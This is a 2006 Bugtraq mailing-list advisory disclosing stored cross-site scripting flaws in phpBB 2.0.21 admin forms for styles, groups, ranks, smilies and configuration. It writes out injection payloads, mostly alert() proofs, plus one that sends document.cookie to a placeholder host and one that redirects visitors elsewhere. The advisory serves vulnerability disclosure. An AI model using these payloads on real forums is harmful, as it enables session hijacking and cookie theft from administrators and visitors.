[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060711075536.24162.qmail@securityfocus.com>
Date: 11 Jul 2006 07:55:36 -0000
From: renatrix@...il.com
To: bugtraq@...urityfocus.com
Subject: XSS phpBB 2.0.21 in administration
phpBB 2.0.21 XSS in administration
**********************************
//-- By Blwood [renatrix@...il.com]
//-- [ http://www.blwood.net ]
//--
Style Admin
-----------
Management & Create a theme
Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...
We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1>
but it's more interresting to inject javascript :) :
"><body onload="alert('Owned by Blwood')"> => style_name
"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...
When an admin will go in Style Administration he will be Owned. (inject in style_name)
When an admin will edit a them he will be Owned.
Group Administration
--------------------
Management
Input group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script>
When an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php
by every visitors.
An exploit could be :
</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>
or
</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>
Ranks
-----
Rank Administration
Rank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script>
But what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :)
Now you can inject what you want but maximum 40 caracters...
Smilies
-------
Smiles Editing Utility
Smiley Code : "><body onload="alert('Owned by Blwood')">
Configuration
-------------
General Configuartion
Inputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>
[ Video ]
http://www.blwood.net/advisory/phpbb2021xssadmin.rar
Powered by blists - more mailing lists